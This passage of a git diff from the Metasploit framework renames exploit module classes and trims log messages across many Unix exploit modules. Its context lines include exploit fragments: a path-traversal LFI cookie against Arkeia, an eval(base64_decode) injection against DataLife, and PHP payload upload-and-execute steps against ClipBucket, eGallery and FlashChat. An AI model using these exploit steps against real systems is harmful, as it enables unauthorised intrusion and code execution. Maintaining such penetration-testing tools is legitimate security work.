b/modules/exploits/unix/http/ctek_skyrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index cb85ffd2a2..2c1e3a00a7 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 8a06f2b6b2..f149a66c21 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/twiki_debug_plugins.rb b/modules/exploits/unix/http/twiki_debug_plugins.rb index 53f4b48af4..78c51d98f0 100644 --- a/modules/exploits/unix/http/twiki_debug_plugins.rb +++ b/modules/exploits/unix/http/twiki_debug_plugins.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 4fdbb98670..3765e1585b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return Exploit::CheckCode::Unknown end @@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote version = $2 build = $1 - vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected") + vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected") else - vprint_status("#{peer} - Unexpected vmtadmin.cgi response") + vprint_status("Unexpected vmtadmin.cgi response") return Exploit::CheckCode::Unknown end @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return nil end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") end - print_status("#{peer} - Blind Exploitation - unknown exploitation state") + print_status("Blind Exploitation - unknown exploitation state") return end diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index c9a00bc53e..49205040b0 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb index 1c7b5c64a6..fc495385bd 100644 --- a/modules/exploits/unix/local/chkrootkit.rb +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb index db1aeb5ba1..fb4c775800 100644 --- a/modules/exploits/unix/local/setuid_nmap.rb +++ b/modules/exploits/unix/local/setuid_nmap.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' -class Metasploit4 < Msf::Exploit::Local +class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 6a4c335ca5..c46bbf9295 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 9bdeb95f3d..e86a518727 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 1445b92a9c..5b52c215f9 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index 64b8255efb..5f5c297d71 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 7498d4486e..f197f52cf8 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index c504ba9392..e2bcac05b5 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index a985514797..429deb28bf 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 02376c7c19..3ba50240b7 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 5c1510028b..1ab9cd26f4 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 8cb29c5e9f..3700edc024 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -65,22 +65,22 @@ class Metasploit3 < Msf::Exploit::Remote # check for aa.php res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error("#{peer} - Could not find aa.php") + vprint_error("Could not find aa.php") return Exploit::CheckCode::Safe elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/ - vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.") + vprint_error("ActualAnalyzer is not installed. Try installing first.") return Exploit::CheckCode::Detected end # check version res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body - vprint_status("#{peer} - Found version: #{version}") + vprint_status("Found version: #{version}") if Gem::Version.new(version) <= Gem::Version.new('2.81') report_vuln( host: rhost, @@ -124,12 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on view.php") + vprint_status("Could not find any hosts on view.php") end nil end @@ -146,12 +146,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") + vprint_good("Found analytics host: #{analytics_host}") return analytics_host else - vprint_status("#{peer} - Could not find any hosts on code.php") + vprint_status("Could not find any hosts on code.php") end nil end @@ -184,12 +184,12 @@ class Metasploit3 < Msf::Exploit::Remote } ) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 200 && res.body =~ />Login</ - vprint_status("#{peer} - Login failed.") + vprint_status("Login failed.") elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body - vprint_good("#{peer} - Found analytics host: #{analytics_host}") - print_good("#{peer} - Login successful! (#{user}:#{pass})") + vprint_good("Found analytics host: #{analytics_host}") + print_good("Login successful! (#{user}:#{pass})") service_data = { address: Rex::Socket.getaddress(rhost, true), port: rport, @@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote create_credential_login(login_data) return analytics_host else - vprint_status("#{peer} - Could not find any hosts on admin.php") + vprint_status("Could not find any hosts on admin.php") end nil end @@ -230,10 +230,10 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out") elsif res.code == 302 && res.headers['Content-Type'] =~ /image/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") return true elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/ - vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") + vprint_status("Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.") elsif res.code == 200 && res.body =~ /Admin area<\/title>/ fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.") else @@ -257,7 +257,7 @@ class Metasploit3 < Msf::Exploit::Remote end analytics_hosts.uniq.each do |host| next if host.nil? - vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") + vprint_status("Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") break if execute_command(payload.encoded, analytics_host: host) end end diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index 9b029120b6..2d27a36799 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + print_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "10.0.10" return Exploit::CheckCode::Safe end # Check for vulnerable component - vprint_status("#{peer} - Trying to detect the vulnerable component") + vprint_status("Trying to detect the vulnerable component") res = send_request_cgi({ 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote file = post_data.to_s file.strip! - print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") + print_status("Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "scripts", "upload.php"), @@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("/tmp/ApplianceUpdate") - print_status("#{peer} - Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") + print_status("Sending LFI payload to execute PHP code in /tmp/ApplianceUpdate") res = send_request_cgi({ 'method' => 'GET', 'headers' => { 'Cookie' => "lang=../../../../../../../../../../../../../../../../tmp/ApplianceUpdate%00en" }, @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index bc273029c4..c047d659b8 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 516bac7a51..b91d673eb6 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index de4f73f6b2..12a82d861e 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index ce3cf84b4a..d334336979 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 574db617bd..48882338b7 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index 3dcef095f8..748c447481 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 66ab5cdf4e..a91d30bcad 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index 045be447c2..247850e4b8 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb index 66e4aed547..108a21e443 100644 --- a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb +++ b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index 0e8aad113d..30434c954c 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 55abc7908c..538cc64d7a 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote # Check version peer = "#{rhost}:#{rport}" - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version > "2.6" return Exploit::CheckCode::Safe @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php" - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"), @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) + print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 948a9108db..4d589b50b6 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 10291ae9a6..603c96f61f 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the preg_replace() to execute PHP code") + print_status("Exploiting the preg_replace() to execute PHP code") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 7ae0f83833..cd39139bb4 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index a218ee92b0..bbbfdab839 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), @@ -102,11 +102,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index b4cb968c14..ed1b03f3f3 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ return Exploit::CheckCode::Appears @@ -132,14 +132,14 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path # upload - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) # register the file to clean register_files_for_cleanup(fname) # exec - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 0cb8ac52d9..297c2c987f 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index 58afa2be55..ce9fec4a64 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version =~ /2\.(9|10|11)\.0/ return Exploit::CheckCode::Appears @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_data = rand_text_alpha_lower(rand(10) + 5) - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index 2ae8d9d41a..d5969f2945 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5c2569966f..110a0ca5ec 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ 